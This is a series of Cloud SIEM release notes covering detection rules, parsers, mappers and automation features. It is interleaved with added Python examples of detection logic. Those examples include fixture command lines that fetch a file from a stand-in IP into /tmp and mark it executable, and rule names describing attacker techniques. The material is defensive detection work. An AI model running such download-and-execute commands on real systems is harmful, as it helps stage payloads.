In addition, the release introduces the ability to auto-set schema tag values on matching Entities based on the value of a given inventory attribute. In this example, any user Entity that has a value for location in inventory data will have that value set in a tag (such as Location:Austin).

Entity Group Details Panel

When using dynamic schema tags, you can still set static tags, criticality, and suppression state.

These two enhancements will reduce the number of Entity Groups needed to properly configure your Entities automatically and will automate a more complete and accurate set of Entity attributes, improving Rule and Analyst efficiency.
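To make the attribute resolution concrete, here is an added example (not the product's implementation or configuration format; the inventory records, entity type names and group definition are constructed assumptions) that resolves dotted inventory paths, including second-level unnormalized attributes such as fields.hr.department, filters entities against group criteria, and derives schema tags such as Location:Austin from each matching entity's own inventory values.

```python
# Constructed inventory records. Normalized attributes (entityType, value, group) sit at the
# top level; unnormalized attributes sit under "fields" and may be nested or absent.
INVENTORY = [
    {"entityType": "_username", "value": "alice", "group": "engineering",
     "fields": {"location": "Austin", "hr": {"department": "Platform", "tier": "2"}}},
    {"entityType": "_username", "value": "bob", "group": "finance",
     "fields": {"location": "Denver", "hr": {"department": "Treasury", "tier": "1"}}},
    {"entityType": "_hostname", "value": "db01", "group": "engineering",
     "fields": {"location": "Austin", "hr": {}}},
]

# A hypothetical Entity Group definition (not the product's configuration format).
GROUP = {
    "name": "Austin users",
    "entityType": "_username",
    "criteria": {"fields.location": "Austin"},               # every criterion must match
    "static_tags": ["managed"],
    "dynamic_tags": {"Location": "fields.location",           # schema tag key -> inventory path
                     "Dept": "fields.hr.department"},
    "criticality": "high",
}


def get_attr(record, path):
    """Resolve 'group' or a dotted path such as fields.hr.department; None if any hop is missing."""
    cur = record
    for part in path.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def apply_group(group, inventory):
    """Return {entity value: {"tags": [...], "criticality": ...}} for entities the group matches.

    Static tags are applied as-is; dynamic tags become Key:Value from the entity's own inventory
    and are skipped (rather than emitted as Key:None) when the attribute is missing or blank.
    """
    matched = {}
    for rec in inventory:
        if rec.get("entityType") != group["entityType"]:
            continue
        if not all(get_attr(rec, path) == want for path, want in group["criteria"].items()):
            continue
        tags = list(group["static_tags"])
        for key, path in group["dynamic_tags"].items():
            val = get_attr(rec, path)
            if val not in (None, ""):
                tags.append(f"{key}:{val}")
        matched[rec["value"]] = {"tags": tags, "criticality": group["criticality"]}
    return matched


if __name__ == "__main__":
    for entity, attrs in apply_group(GROUP, INVENTORY).items():
        print(entity, attrs)
```

The point of the dynamic tag is visible in the output: one group definition yields Location:Austin for one user and would yield Location:Denver for another, where previously each location needed its own group.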

There is much more information about Entity Groups and these enhancements in the online documentation.

Bug Fixes

  • Multiple entries were being added to the audit log when some Insights were created.
  • Some Insights were not getting enriched with VirusTotal using the direct integration.
  • Time-to-live was temporarily considered a mandatory attribute for match lists.

September 11, 2023 - Application Update

Automation Service

Sumo Logic is excited to announce that the Automation Service for Cloud SIEM is now generally available for all Cloud SIEM customers. The Automation Service uses Cloud SOAR capabilities -- without needing Cloud SOAR itself -- to allow you to define and automate smart actions, including enrichments and notifications. These actions can be automatically triggered when certain events occur in Cloud SIEM, helping you to quickly investigate, understand, and react to potential security threats.

You can interact with the service through automations, which execute playbooks. Playbooks are composed of one or more actions with a workflow that could include parallel actions and logic steps. Actions are defined as part of integrations with specific internal and external applications. Sumo Logic provides hundreds of integrations, actions, and playbooks out of the box that you can use and customize. You can also create your own.

Automation Service

Automations are accessible through the Configuration menu, under Integrations. Automation results are accessible from Insight and Entity detail pages.

The Automation Service does not include the full capabilities of Cloud SOAR. For example, it only supports enrichment, notification, and custom action types, and its playbooks can only be triggered from Cloud SIEM. There is also a limit on the number of actions you can run per hour. However, if you do have Cloud SOAR, then once you have upgraded to the Fall 2023 release of Cloud SOAR (currently in Beta), Cloud SIEM will use it to run automations instead of the Automation Service, giving Cloud SIEM access to the full capabilities of Cloud SOAR.

Over time, the legacy Insight Actions and Cloud SIEM Enrichment Service features will be deprecated in favor of this new service. (The new service includes integrations and actions corresponding to the legacy Insight Actions and can run existing Enrichment Service PowerShell scripts. The online documentation has more information about migrating.) Note that the Automation Service is not yet available in the FedRAMP environment.

There is much more information about the Automation Service and how to use it in the online documentation.

Minor Changes and Enhancements

  • [New] Tag schemas and context actions can now be managed via API (/tag-schemas and /context-actions). See the API documentation for details.
  • [Updated] Threat indicator icons will now appear where appropriate in the Active Entities panel on the HUD.

Bug Fixes

  • Some records were not being auto-enriched with Network Block data.
  • Some internal IP addresses were being marked as external.
  • The HUD was not updating Insight status counts in a timely fashion.
  • Window size was not saving correctly when defining a new Outlier rule.

September 7, 2023 - Content Release

This release includes new detections for macOS systems and mapping support for Dataminr Alerts. It also includes fixes aimed at reducing false positives and correcting the transposition of description and summary on several rules. Other changes are enumerated below.

Rules

  • [New] CHAIN-S00016 macOS - Suspicious Osascript Execution and Network Activity
  • [New]* FIRST-S00039 First Seen mdfind Usage from User
  • [New]* FIRST-S00041 First Seen networksetup Usage from User
  • [New]* FIRST-S00042 First Seen Ioreg Usage from User
  • [New]* FIRST-S00043 First Seen pbpaste Usage from User
  • [New] MATCH-S00878 macOS - Suspicious Osascript Parent Execution
  • [New] MATCH-S00879 macOS - Suspicious Osascript Execution
  • [New] MATCH-S00880 macOS - Entitlement Enumeration via Xattr
  • [New]* MATCH-S00881 macOS - csrutil status Usage Detected
  • [New] MATCH-S00882 macOS - System Preference Enumeration via Security Binary
  • [New] MATCH-S00883 macOS - Keychain Enumeration
  • [New] MATCH-S00884 macOS - Suspicious Python PIP Execution
  • [New] MATCH-S00885 macOS - Screen Sharing Session Established
  • [New]* MATCH-S00886 Suspicious chmod Execution

* These rules were originally released September 1, but have been updated in this release.

Log Mappers

  • [New] Dataminr Alerts
  • [Updated] Squid Proxy - Parser
    • Updated mapper to take advantage of additional parsed data (see parser updates)

Parsers

  • [Updated] /Parsers/System/Squid/Squid Proxy Syslog
    • Updated parser to extract port and protocol information from URL when present

August 22, 2023 - Content Release

This release contains updates to MITRE ATT&CK tags, used in several rules, that had been deprecated, removed, or were otherwise invalid. Other changes are enumerated below.

Rules

  • [New] MATCH-S00886 Suspicious chmod Execution
    • This alert looks for a "chmod" execution on a file that is found on the /tmp directory of a Linux or macOS host. Threat actors may download and copy files to this directory and add execution bits or change permissions on these files.
  • [Updated] MATCH-S00516 Antivirus Ransomware Detection
  • [Updated] MATCH-S00534 MacOS - Re-Opened Applications
  • [Updated] MATCH-S00149 PowerShell File Download
  • [Updated] MATCH-S00342 Suspicious use of Dev-Tools-Launcher
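To make the MATCH-S00886 description above concrete, the following is an added example of the same detection logic written in Python. It is not the rule's actual expression and not Sumo Logic code; the event field names (device_hostname, user_username, commandLine) and the sample events are constructed for the illustration. It goes slightly beyond the text by handling both octal and symbolic chmod modes and the macOS /private/tmp spelling of /tmp.

```python
import os
import re
import shlex

# Constructed sample endpoint process events. The field names are assumptions
# chosen to resemble normalized Cloud SIEM records, not the product's exact schema.
SAMPLE_EVENTS = [
    {"device_hostname": "mac-01", "user_username": "alice",
     "commandLine": "chmod +x /tmp/update.sh"},
    {"device_hostname": "lnx-07", "user_username": "svc-build",
     "commandLine": "chmod 0755 /private/tmp/agent"},
    {"device_hostname": "lnx-07", "user_username": "bob",
     "commandLine": "chmod 644 /tmp/notes.txt"},          # no execute bit added
    {"device_hostname": "lnx-03", "user_username": "bob",
     "commandLine": "chmod u+x /home/bob/build.sh"},      # not under /tmp
    {"device_hostname": "lnx-03", "user_username": "root",
     "commandLine": "/bin/chmod -R a+rx /tmp/.cache/"},
    {"device_hostname": "lnx-03", "user_username": "root",
     "commandLine": "ls -la /tmp"},
]

# /tmp on macOS is a symlink to /private/tmp, so both spellings are covered.
TMP_PREFIXES = ("/tmp/", "/private/tmp/")

OCTAL_RE = re.compile(r"[0-7]{3,4}")
SYMBOLIC_RE = re.compile(r"[ugoa]*(?:[-+=][rwxXstugo]*)+")


def is_mode(token: str) -> bool:
    """True if the token looks like a chmod mode rather than an option or a path."""
    return bool(OCTAL_RE.fullmatch(token) or SYMBOLIC_RE.fullmatch(token))


def mode_adds_exec(mode: str) -> bool:
    """True if the mode grants an execute bit to anyone.

    Octal: any of the low three digits carries the x bit (a leading
    setuid/setgid/sticky digit is ignored). Symbolic: any clause uses + or =
    together with x or X. A mode such as -x only removes execute and is ignored.
    """
    if OCTAL_RE.fullmatch(mode):
        return bool(int(mode[-3:], 8) & 0o111)
    for clause in mode.split(","):
        for op, perms in re.findall(r"([-+=])([rwxXstugo]*)", clause):
            if op in "+=" and ("x" in perms or "X" in perms):
                return True
    return False


def parse_chmod(command_line: str):
    """Return (mode, targets) for a chmod invocation, or None if it is not one."""
    try:
        argv = shlex.split(command_line)
    except ValueError:
        return None
    if not argv or os.path.basename(argv[0]) != "chmod":
        return None
    mode, targets = None, []
    for tok in argv[1:]:
        if mode is None:
            if is_mode(tok):
                mode = tok
            elif tok.startswith("-"):
                continue            # option such as -R or -v
            else:
                return None         # unrecognised shape, e.g. --reference=FILE
        else:
            targets.append(tok)
    return (mode, targets) if mode else None


def under_tmp(path: str) -> bool:
    """True for /tmp, /private/tmp and anything below them (after normalisation)."""
    return (os.path.normpath(path) + "/").startswith(TMP_PREFIXES)


def detect_tmp_chmod(events):
    """Emit one signal per event where chmod adds an execute bit to a /tmp path."""
    signals = []
    for ev in events:
        parsed = parse_chmod(ev["commandLine"])
        if parsed is None:
            continue
        mode, targets = parsed
        hits = [t for t in targets if under_tmp(t)]
        if hits and mode_adds_exec(mode):
            signals.append({
                "device_hostname": ev["device_hostname"],
                "user_username": ev["user_username"],
                "mode": mode,
                "targets": hits,
            })
    return signals


if __name__ == "__main__":
    for s in detect_tmp_chmod(SAMPLE_EVENTS):
        print(s)
```

Relative paths (a `chmod +x ./x` run with /tmp as the working directory) are not caught here, because the command line alone does not carry the working directory; a production rule would need that field from the endpoint agent.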

Log Mappers

  • [Updated] Microsoft Defender for Cloud - Security Alerts
    • Adds support for Security Alerts via Azure Activity Log
  • [Updated] Zscaler - Nanolog Streaming Service - JSON
    • Adds alternate values for NSS mappers to ensure proper normalization
  • [Updated] Zscaler Firewall
    • Adds alternate values for ZScaler Firewall mappers to ensure proper normalization

August 22, 2023 - Application Update

Deprecation Notice

After careful evaluation, we have deprecated Grok patterns immediately for customers who've not used the feature in the last 30 days. Our more robust and configurable solution is already available for customers in the Sumo Logic parsers. More details on how parsing works in Sumo Logic can be found in the Parsing Language Reference Guide.

For customers who are still using Grok, further communication along with a path to migrate to the Sumo Logic parsers will be provided in the coming weeks.


August 4, 2023 - Content Release

This release includes minor updates and a new log mapper for Microsoft Defender.

Rules

  • [Updated] MATCH-S00231 Azure - Member Added to Company Administrator Role
    • Updated expression to account for parser and vendor schema changes
  • [Updated] THRESHOLD-S00097 Impossible Travel - Successful
    • Removed vendor/product grouping
  • [Updated] THRESHOLD-S00098 Impossible Travel - Unsuccessful
    • Removed vendor/product grouping
  • [Updated] MATCH-S00167 Recon Using Common Windows Commands
    • Bug fix for Qualys path exclusion not working

Log Mappers

  • [New] Microsoft Defender for Cloud - Security Alerts
    • Support for new log schema

Parsers

  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON
    • Added additional time format

August 3, 2023 - Content Release

This release includes updated MITRE ATT&CK™ technique tags on several rules and added support for Microsoft Graph Security Alert API 1.0 via C2C.

Rules

  • [Deleted] OUTLIER-S00012 Spike in AWS New Service Creation or Port Connection from Source Address
    • As advised in the advance notice on July 14th, 2023, this Outlier rule was deleted due to performance and efficacy findings.
  • [Updated] MATCH-S00679 AWS Route 53 Domain Registered
  • [Updated] FIRST-S00038 First Seen Wget Usage from User
  • [Updated] MATCH-S00830 Office 365 Forwarding Rule Created
  • [Updated] LEGACY-S00064 Potentially vulnerable software detected
  • [Updated] LEGACY-S00086 SSL Certificate Not Valid Yet
  • [Updated] LEGACY-S00087 SSL Heartbleed Attack
  • [Updated] LEGACY-S00089 SSL Heartbleed Many Requests
  • [Updated] LEGACY-S00090 SSL Heartbleed Odd Length
  • [Updated] LEGACY-S00091 SSL Invalid Server Cert
  • [Updated] LEGACY-S00096 Shellshock

Log Mappers

  • [New] Microsoft Graph Security Alert API C2C

Parsers

  • [New] /Parsers/System/Microsoft/Graph Security Alert API

July 21, 2023 - Content Release

This release includes:

  • Removal of unused legacy parsers and directly associated mappers and rule content.
  • Support for Windows Event Log JSON ingested via the OpenTelemetry collector. XML and JSON via OTel are now fully supported in Cloud SIEM.

Rules

  • [New] FIRST-S00038 First Seen Wget Usage from User
    • Observes for execution of Wget from a user for the first time since the baseline period (14 days).
  • [Updated] LEGACY-S00009 Bluecoat Proxy - Suspicious or Malicious Categories
    • Fix to account for minor difference from legacy parser to current parser.
  • [Updated] FIRST-S00016 First Seen Non-Network/Non-System Logon from User
    • Excludes LogonTypes for System Startup, Batch, and Service to reduce volume of records matching.
  • [Deleted] MATCH-S00073 Palo Alto - Traps Templated Events
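The First Seen rule described for FIRST-S00038 above can be reproduced in a few lines. This is an added example, not Sumo Logic's implementation: the event tuple shape is constructed, and the exact semantics (no Signals while the rule is younger than the baseline period, then a Signal whenever the user has not run wget in the trailing 14 days) are this example's assumption about how "first time since the baseline period" is evaluated.

```python
import os
import shlex
from datetime import datetime, timedelta

BASELINE = timedelta(days=14)

# Constructed process events in time order: (timestamp, user, command line).
# The stream shape and field choices are assumptions for this illustration.
EVENTS = [
    ("2023-07-01T09:00:00", "alice", "wget https://files.example.test/a.tgz"),
    ("2023-07-03T10:00:00", "bob",   "wget http://10.0.0.5/tool"),
    ("2023-07-16T08:00:00", "alice", "wget https://files.example.test/b.tgz"),
    ("2023-07-16T09:00:00", "alice", "wget https://files.example.test/c.tgz"),
    ("2023-07-20T11:00:00", "carol", "/usr/bin/wget -O /tmp/x http://203.0.113.9/x"),
    ("2023-07-21T11:00:00", "bob",   "curl http://10.0.0.5/tool"),
    ("2023-07-30T11:00:00", "bob",   "wget http://10.0.0.5/tool2"),
]


def is_wget(command_line: str) -> bool:
    """Match wget by the executable's basename so /usr/bin/wget also counts."""
    try:
        argv = shlex.split(command_line)
    except ValueError:
        return False
    return bool(argv) and os.path.basename(argv[0]) == "wget"


class FirstSeenRule:
    """First Seen detector keyed on an Entity value (here, the user name).

    Assumed semantics: while the rule is younger than the baseline period it
    only learns; afterwards a Signal fires when the key has not been observed
    within the trailing baseline period.
    """

    def __init__(self, baseline: timedelta = BASELINE):
        self.baseline = baseline
        self.rule_start = None      # set from the first matching event
        self.last_seen = {}

    def observe(self, ts: datetime, key: str) -> bool:
        if self.rule_start is None:
            self.rule_start = ts
        previous = self.last_seen.get(key)
        self.last_seen[key] = ts
        if ts - self.rule_start < self.baseline:
            return False                       # still building the baseline
        return previous is None or ts - previous > self.baseline


def first_seen_wget(events, baseline: timedelta = BASELINE):
    """Return (timestamp, user) for each event that fires the rule."""
    rule = FirstSeenRule(baseline)
    signals = []
    for raw_ts, user, cmd in events:
        if not is_wget(cmd):
            continue
        ts = datetime.fromisoformat(raw_ts)
        if rule.observe(ts, user):
            signals.append((ts, user))
    return signals


if __name__ == "__main__":
    for ts, user in first_seen_wget(EVENTS):
        print(f"{ts.isoformat()} first seen wget from {user}")
```

On the constructed stream, alice fires on July 16 (her July 1 run is older than 14 days), carol fires on her first ever run, and bob fires on July 30; alice's second run an hour later and bob's curl do not.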

Log Mappers

  • [Updated] AWS Security Hub
    • Lowered normalizedSeverity to reduce false positives from passthrough Signals.
  • [Updated] CrowdStrike Falcon Identity Protection (CNC)
    • Adjusted IdentityProtectionEvent normalizedSeverity to use INFO, LOW, MEDIUM, and HIGH instead of numeric values to improve consistency.
  • [Updated] Windows - Security - 4627
    • Added mapping for logonType '0' representing a system startup.
  • [Deleted] AD Audit DNS
  • [Deleted] AD Audit Comp
  • [Deleted] AD Audit LDAP
  • [Deleted] AD Audit Local Logon
  • [Deleted] AD Audit Server
  • [Deleted] AD Audit User
  • [Deleted] Blue Coat Proxy 1
  • [Deleted] Blue Coat Proxy 3
  • [Deleted] Cisco Firepower Malware Event 430005
  • [Deleted] Cisco Ironport WSA NOHD 02
  • [Deleted] Citrix Xenserver Auth Message
  • [Deleted] Cylance_Audit_1
  • [Deleted] Cylance_Audit_2
  • [Deleted] Ironport Cisco
  • [Deleted] LINUX Root Login
  • [Deleted] LINUX Root Login with Username
  • [Deleted] LINUX User Authenticated
  • [Deleted] LINUX User Authenticated no Username
  • [Deleted] LINUX User Session Open/Close
  • [Deleted] Palo Alto Traps Misc
  • [Deleted] Symantec SEP Compressed File
  • [Deleted] Symantec SEP MEM System
  • [Deleted] Symantec SEP Potential Risk Found 04
  • [Deleted] Symantec SEP Security Risk Found 2
  • [Deleted] Symantec SEP Sonar Detection Variation 2
  • [Deleted] Symantec SEP Virus Found
  • [Deleted] Tanium S05 Logs

Parsers

  • [New] /Parsers/System/Microsoft/Windows-JSON-Open Telemetry

Legacy Parsers

  • [Deleted] ADAUDIT_COMP
  • [Deleted] ADAUDIT_DNS
  • [Deleted] ADAUDIT_LDAP
  • [Deleted] ADAUDIT_LOCAL_LOGON
  • [Deleted] ADAUDIT_SERVER
  • [Deleted] ADAUDIT_USER
  • [Deleted] BLUECOAT_PROXY_1
  • [Deleted] BLUECOAT_PROXY_3
  • [Deleted] CYLANCE_AUDIT1
  • [Deleted] CYLANCE_AUDIT2
  • [Deleted] Firepower_Malware_Event_430005
  • [Deleted] IRON_PORT_CISCO
  • [Deleted] IRON_PORT_WSA_NOHD_02
  • [Deleted] LINUX_AUTH
  • [Deleted] LINUX_ROOT_GENERIC
  • [Deleted] LINUX_ROOT_LOGIN
  • [Deleted] LINUX_ROOT_NO_USER
  • [Deleted] LINUX_ROOT_USER
  • [Deleted] PAN_TRAPS_MISC
  • [Deleted] SYMANTEC_SEP_CF
  • [Deleted] SYMANTEC_SEP_MEMS
  • [Deleted] SYMANTEC_SEP_PRF_04
  • [Deleted] SYMANTEC_SEP_SDN_02
  • [Deleted] SYMANTEC_SEP_SRF_2
  • [Deleted] SYMANTEC_SEP_VF_01
  • [Deleted] TANIUM_S05_TYPE_LOGS
  • [Deleted] VDM_LOG_SECURE
  • [Deleted] citrix_xenserver_auth_message

July 21, 2023 - Application Update

Minor Changes and Enhancements

  • [Update] The Cloud SIEM UI has been updated with refreshed fonts and colors to better align with the core Sumo Logic pages. This is the first change in a greater series of updates designed to present a more unified user experience across Sumo Logic feature sets.
  • [New] The Signal Severity Total, an indication of the activity for an Entity, has been added to the Entity list and details views. The Signal Severity Total is calculated by adding up the severity value for each of the Signals generated against a given Entity during the current detection window (by default 14 days), not including duplicate or suppressed Signals.

Bug Fixes

  • With the recent changes to log mapping, some users were seeing an error when attempting to use custom input vendors and/or products.
  • Entity lookup normalization was taking place after Entity Groups were processed; normalization now happens first.

July 14, 2023 - Content Release

Starting with this release, the rule type for First Seen rules is now "Anomaly", and Outlier Rules have been promoted from prototype mode.

NOTE: Due to performance and efficacy findings, OUTLIER-S00012 will be deleted on July 28th. If you wish to retain this rule, it must be duplicated in the Cloud SIEM Rules UI.

Rules

  • [Updated] OUTLIER-S00001 Spike in login failures from a user
    • Removed incorrect match list from expression.
    • Will remain in prototype an additional week due to changes made to the rule expression.
  • [Updated] OUTLIER-S00002 Spike in Successful Distinct Share Access
  • [Updated] OUTLIER-S00003 Spike in Failed Share Access by User
  • [Updated] OUTLIER-S00004 Spike in Azure Firewall Deny Events from Source IP
  • [Updated] OUTLIER-S00005 Spike in AWS API Call from User
  • [Updated] OUTLIER-S00006 Spike in Data Transferred Outbound by User
  • [Updated] OUTLIER-S00007 Spike in Windows Administrative Privileges Granted for User
  • [Updated] OUTLIER-S00008 Spike in Failed Azure Sign In Attempts Due to Bad Password from IP Address
  • [Updated] OUTLIER-S00009 Spike in PowerShell Command Line Length From Host
  • [Updated] OUTLIER-S00010 Spike in URL Length from IP Address
  • [Updated] OUTLIER-S00011 Spike in AWS AccessDenied Events by assumedrole

Schema

  • [New] http_referer_queryParameters
    • New queryParameters enrichment/mappable field
  • [New] http_url_queryParameters
    • New queryParameters enrichment/mappable field
  • [New] objectClassification
    • Allows objectClassification to be used in Cloud SIEM rule expressions.

July 13, 2023 - Application Update

New RBAC Capabilities

Reminder: Earlier this week, we introduced new RBAC capabilities for Cloud SIEM: View Entities and Manage Entities. Users with the built-in administrator role received these capabilities automatically, but admins must manually add these capabilities to other roles as appropriate. If a user has neither capability, they will not be able to see Entity details or interact with or manage Entities in any way.

Minor Changes and Enhancements

  • [Update] The Entity Timeline feature is now available for all Entity types, including custom types.
  • [New] When viewing an Entity's detail page, both Entity Groups that apply to that Entity and membership in a suppression list will now be listed.

Bug Fixes

  • Some customers were seeing non-blocking errors loading Insight detail pages, and links to Cloud SOAR, when they should not have.
  • The number of records ingested into Cloud SIEM was not being reported consistently on the HUD.

July 11, 2023 - Content Release

This content release includes parsing and mapping updates to Fortinet to account for variations in URL information present in the log sometimes leading to malformed URLs being normalized, adjustments to Jamf mappings to account for case variations in certain fields, as well as changes enumerated below.

Rules

  • [Updated] OUTLIER-S00010 Spike in URL Length from IP Address
    • Narrowed rule expression to NetworkHTTP and NetworkProxy records

Log Mappers

  • [Updated] Fortinet App Control Logs
  • [Updated] Fortinet DLP Logs
  • [Updated] Fortinet Event Logs
  • [Updated] Fortinet IPS Logs
  • [Updated] Fortinet Traffic Logs
  • [Updated] Fortinet Virus Logs
  • [Updated] Fortinet Webfilter Logs
  • [Updated] Jamf Audit User - Audit
  • [Updated] Jamf Audit User - Authentication
  • [Updated] Jamf Audit User - Endpoint
  • [Updated] Jamf Audit User - Network
  • [Updated] SentinelOne Logs - C2C threats
    • Adds alternate value for normalizedSeverity lookup

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco Meraki
    • Support for more variation in content filtering block logs and additional drops for events of limited to no security value.

June 29, 2023 - Content Release

This release includes parsing and mapping updates to Fortinet to account for variations in URL information present in the log sometimes leading to malformed URLs being normalized, adjustments to Jamf mappings to account for case variations in certain fields, as well as changes enumerated below.

Rules

  • [Updated] OUTLIER-S00010 Spike in URL Length from IP Address
    • Narrowed rule expression to NetworkHTTP and NetworkProxy records

Log Mappers

  • [Updated] Fortinet App Control Logs
  • [Updated] Fortinet DLP Logs
  • [Updated] Fortinet Event Logs
  • [Updated] Fortinet IPS Logs
  • [Updated] Fortinet Traffic Logs
  • [Updated] Fortinet Virus Logs
  • [Updated] Fortinet Webfilter Logs
  • [Updated] Jamf Audit User - Audit
  • [Updated] Jamf Audit User - Authentication
  • [Updated] Jamf Audit User - Endpoint
  • [Updated] Jamf Audit User - Network
  • [Updated] SentinelOne Logs - C2C threats
    • Adds alternate value for normalizedSeverity lookup

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco Meraki
    • Support for more variation in content filtering block logs and additional drops for events of limited to no security value.
  • [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-Syslog

June 29, 2023 - Application Update

New RBAC Capabilities

Starting Thursday, July 6, we're introducing new RBAC capabilities for Cloud SIEM: View Entities and Manage Entities. Users with the built-in administrator role will receive these capabilities automatically, but admins must manually add these capabilities to other roles as appropriate. If a user has neither capability, they will not be able to see Entity details or interact with or manage Entities in any way.

Minor Changes and Enhancements

  • [New] Nodes can now be moved around individually on the Insight Related Entities Graph.
  • [Update] To align more closely with accepted industry definitions, we are changing the Dwell Time label on Insight metrics in the UI to Detection Time. Note that only the label is changing, not how the metric is calculated (i.e., the period of time between when the first record in an Insight was observed and when the Insight was created).
  • [Update] Match list updates containing more than 1,000 entries are now supported by our Terraform provider.
  • [Update] When a custom product or vendor is selected in log mapping, the string entered by the user is now indexed instead of the word "Custom", so that the custom entry can be searchable/filterable. This only applies to mappings configured going forward.
  • [New] Custom tag schemas can now be retrieved via API (GET /tag-schemas).
  • [New] When viewing Rule Tuning Expressions, if one applies to all rules, it will now say All instead of giving a numerical count.
  • [Update] The Cloud SIEM UI color palette has been updated to more closely align with the standard Sumo Logic "dark mode" color palette.

Bug Fixes

  • Insight sub-resolutions were not being passed to XSOAR correctly in some circumstances.
  • Some users were unable to override fields on some Sumo-provided rules.
  • When extracting fields in rule expressions, double quotes were not working ({{fields["<field_name>"]}}).

June 22, 2023 - Content Release

This release includes an updated parser and new mappers for Aruba ClearPass Syslog events, minor bug fixes to several First Seen rules, and the other changes enumerated below.

Rules

  • [Updated] MATCH-S00814 Abnormal Child Process - sdiagnhost.exe - CVE-2022-30190
    • Adds requirement that commandLine is present for a match
  • [Updated] FIRST-S00016 First Seen Non-Network Logon from User
  • [Updated] FIRST-S00008 First Seen whoami command From User
  • [Updated] MATCH-S00815 Threat Intel - Successful Authentication from Threat IP
    • Adds dstDevice_ip to entity selection

Log Mappers

  • [New] Aruba ClearPass Guest Access
  • [New] Aruba ClearPass WiFi Access Tracker
  • [New] Aruba ClearPass Wifi Failed Tracker
  • [Updated] Aruba ClearPass Syslog
  • [Updated] Tenable.io Authentication
    • Adds alternative key matches for vuln_cve and description fields

Parsers

  • [Updated] /Parsers/System/HP/Aruba ClearPass - Syslog

June 20, 2023 - Application Update

Outlier Rules

Sumo Logic is pleased to announce a new rule type for Cloud SIEM: Outlier Rules. This new rule type further enhances Cloud SIEM’s User and Entity Behavioral Analytics (UEBA) capabilities. With these rules, Cloud SIEM can detect events that deviate from the usual behavior of an Entity, such as a spike in login failures from a user, without having to define a static threshold. Once the rule is set, Cloud SIEM automatically builds a normal behavior baseline for each Entity based on the rule expression. It creates a signal only when a deviation from normal behavior is detected (in this case, too many login failures compared to their normal baseline behavior). Other examples include detecting a spike in Windows administrative privileges granted and a spike in AWS calls from a user.

Outlier Rules are defined like any other rule type through the Content menu in Cloud SIEM.

Example Signal from Outlier Rule

Outlier Rules operate based on a baseline. During this period - typically between 7 and 30 days - the system will learn what normal behavior looks like. After the baseline is established, Cloud SIEM will begin generating Signals when unusual behavior is detected compared to that baseline. (Note that the longer the baseline, the more accurate the model will be.)

Cloud SIEM will include a set of Outlier Rules out of the box. These rules can be tuned and customized like any other rule type, and custom Outlier Rules can also be created.
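The difference between a static threshold and a learned baseline is easiest to see on data. Below is an added example (not Sumo Logic's model, whose internals the release notes do not describe) that evaluates the "spike in login failures from a user" case both ways over constructed daily counts. The 14-day baseline, the mean-plus-three-standard-deviations limit and the minimum-count floor are this example's assumptions.

```python
import statistics

BASELINE_DAYS = 14   # inside the 7 to 30 day range described above
Z_SCORE = 3.0        # how far above its own baseline a day must sit (assumption)
MIN_COUNT = 5        # floor so a very quiet Entity does not alert on 2 failures (assumption)

# Constructed daily login-failure counts per user: 14 baseline days followed by
# 3 evaluation days. One noisy service account and one normally quiet user.
DAILY_FAILURES = {
    "svc-scanner": [45, 52, 48, 55, 50, 47, 53, 49, 51, 46, 54, 50, 48, 52] + [51, 49, 55],
    "alice":       [1, 0, 2, 1, 0, 1, 1, 0, 2, 1, 0, 1, 1, 0] + [1, 12, 0],
}


def static_threshold_signals(series, threshold=20):
    """Threshold-rule style: one fixed limit applied to every Entity."""
    return [(user, day, n)
            for user, counts in series.items()
            for day, n in enumerate(counts[BASELINE_DAYS:], start=BASELINE_DAYS)
            if n > threshold]


def baseline_limit(baseline, z=Z_SCORE):
    """Per-Entity limit: mean plus z population standard deviations."""
    return statistics.mean(baseline) + z * statistics.pstdev(baseline)


def outlier_signals(series, baseline_days=BASELINE_DAYS, z=Z_SCORE, min_count=MIN_COUNT):
    """Outlier-rule style: learn each Entity's own normal, then flag days that
    deviate from it. An Entity with less than baseline_days of history is still
    learning and produces no Signals."""
    signals = []
    for user, counts in series.items():
        baseline, evaluation = counts[:baseline_days], counts[baseline_days:]
        if len(baseline) < baseline_days:
            continue
        limit = baseline_limit(baseline, z)
        for day, n in enumerate(evaluation, start=baseline_days):
            if n > limit and n >= min_count:
                signals.append((user, day, n, round(limit, 2)))
    return signals


if __name__ == "__main__":
    print("static threshold:", static_threshold_signals(DAILY_FAILURES))
    print("learned baseline:", outlier_signals(DAILY_FAILURES))
```

With a fixed limit of 20 the scanner account alerts every day and alice's jump from about one failure a day to twelve is never seen; with the learned baseline the scanner stays silent (its limit is roughly 59) and alice's day is the only Signal. Lengthening the baseline tightens the estimate of each Entity's normal, which is the reason the text recommends longer baselines.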

For more information about how to use Outlier Rules, see the online documentation. You can also see an introduction to the feature by navigating to the Rules page in Cloud SIEM.

Minor Changes and Enhancements

  • [New] Users can now customize the global Signal Suppression period. During this period, which is set to 72 hours by default, duplicate signals (with identical names and Entities) are suppressed (for example, they do not “count” towards Insights). With this new feature, this period can be lowered globally (for all rules) to as low as 24 hours. (Note that lowering this value can lead to a higher number of potentially duplicate Insights.) The setting is accessible via the Workflow > Detection option in the Configuration menu.
  • [Updated] Cloud SIEM application status will now be published on the main Sumo Logic status page, https://status.sumologic.com/. (Previously it was published on https://cse-status.sumologic.com/.) Existing email subscriptions and status notifications will be moved to the new page automatically.

June 12, 2023 - Application Update

Minor Changes and Enhancements

  • [New] The Entity Timeline now supports all Entity types (including custom types).
  • [New] The GetSignals API call now includes an attribute with a timestamp when each Signal was created.
  • [Updated] The log mapping UI has been updated so that if a standard vendor and product is selected, those values will be auto-filled on the record configuration, avoiding an issue where customers were accidentally creating 'custom' values.

Bug Fixes

  • An error would occur when sorting entity groups by entity type.
  • The control used to select schema tags for Entities was not working properly.
  • The "View in Log Search / Normalized Data" button was opening a log search window with an incorrect time frame.
  • Global search was not displaying previous searches, and was not returning some Entities.
  • The rule tuning expression editor would not scroll for very long expressions.
  • Importing a rule via the UI was not working in some scenarios.

June 2, 2023 - Content Release

Within this release, we modified the Threat Intel rule MATCH-S00815 to include the user_username associated with the srcDevice_ip, capturing the account the threat IP authenticated with so that actions by that account can be correlated. We also modified the Azure Sign-in Log mapper so that 'properties.userAgent' is mapped to the entity field 'http_userAgent'.

Rules

